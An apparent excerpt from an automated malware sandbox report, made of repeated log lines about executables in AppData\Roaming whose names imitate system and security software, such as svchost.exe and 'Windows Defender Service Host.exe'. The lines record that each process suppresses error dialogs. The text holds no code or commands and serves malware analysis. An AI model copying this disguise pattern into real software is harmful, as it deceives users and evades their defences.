                            Source: C:\Users\user\AppData\Roaming\crack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess information set: NOOPENFILEERRORBOX
